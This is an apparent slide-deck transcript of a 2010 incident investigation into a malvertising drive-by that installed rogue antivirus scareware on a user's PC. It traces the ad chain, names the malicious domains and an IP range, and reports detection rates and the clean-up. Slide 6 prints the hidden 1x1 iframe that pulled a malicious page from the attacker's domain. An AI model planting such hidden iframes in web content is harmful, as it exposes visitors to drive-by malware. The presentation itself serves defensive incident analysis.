1 / 17

Infected PC Investigation Summary

Infected PC Investigation Summary. 6/8/10 infection. The story you are about to hear is true. Only the names have been changed to protect the innocent. Hello,

garson
Download Presentation

Infected PC Investigation Summary

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Infected PC Investigation Summary 6/8/10 infection

  2. The story you are about to hear is true. Only the names have been changed to protect the innocent.

  3. Hello, A user’s pc has been infected with a rogue antispyware called AV security Suite, keeps coming up with bogus viruses and basically has taken over the system. The network has been disconnected, the incident started yesterday 6/08/10, around 4:25 pm.  User has access to level 2 protected info, but does not keep any of that info on her pc. Thanks, Tech Guy

  4. User visited legitimate, medical-dictionary.thefreedictionary.com • Site served up advertising through interclick.com • One of the advertising pulls came from a known "Malvertising" domain h7.ch.adtech.com.niklip.com. Malvertising domains serve up obfuscated JavaScript that redirects browsers to malware “check-in” sites.

  5. Immediately after this pull, a request was made to a known malware "check-in” site statsoplex.co.cc which returned a hidden iframe. Malware check-in sites redirect browsers to SEO (Search Engine Optimization) Exploit drive-by sites.

  6. The iframe <html> <body> <iframesrc="http://aiosstatsungenett.com/info/nag3.html" style="visibility:hidden;" width="1" height="1"></iframe> </body> </html>

  7. The iframe loaded a scareware A/V page from a known SEO Exploit drive-by site, aiosstatsungenett.com. The scareware page, nag3.html, was loaded with obfuscated malware JavaScript.

  8. Two seconds later, the JavaScript that came from aiosstatsungenett.com initiated a 289K application stream to the browser from 188.65.x.x. The application stream turned out to be an infected SWF. An infected PDF was also downloaded.

  9. The Malware Distribution Site • Reverse lookup on 188.65.x.x • protect-ware.com • "Antispyware Soft - Powerfull PC Protection !"

  10. Interesting factoid • All 4 of the above domains were registered within a month of the infection via a Chinese registrar, todaynic.com. • Registrant addresses were in Lithuania, Russia, and Pennsylvania. • IP addresses were in Austria, Belgium, Sweden

  11. Another interesting factoid • Study by Avast! (A/V software) found that for every 1 infected adult site there were 99 other legitimate sites that were infected.

  12. Sites that are known to have been referring clients to malicious advertising services related to this incident • ad.ca.doubleclick.net • ad.doubleclick.net • canada.com • dailymail.co.uk • dailyradar.com • edmontonjournal.com • financialpost.com • google.com • history.com • montrealgazette.com • nasdaq.com • orbitz.com • sportsfanlive.com • tennessean.com • thestarphoenix.com • usatoday.com • vancouversun.com • windsorstar.com

  13. The PC • XP SP3, fully patched • McAfee 8.7 with current engine and signatures • Updated Adobe Reader

  14. The Malware • All JavaScript was obfuscated • The Payload was downloaded without user interaction • Primarily scareware – attempted to convince the user that Antivirus Soft could disinfect and protect her PC • Pretty convincing Product image and System Tray icon. Would have fooled most users.

  15. The Malware • When the malware was uploaded to virustotal.com, only 3/41 products detected (McAfee did not detect) • Next day, detection rate increased to 19/41, this time including McAfee

  16. Results • No indication from firewall logs that this was anything more than an attempt to get the user to buy useless, and likely infected, software • PC was wiped, reloaded, and returned to the user

More Related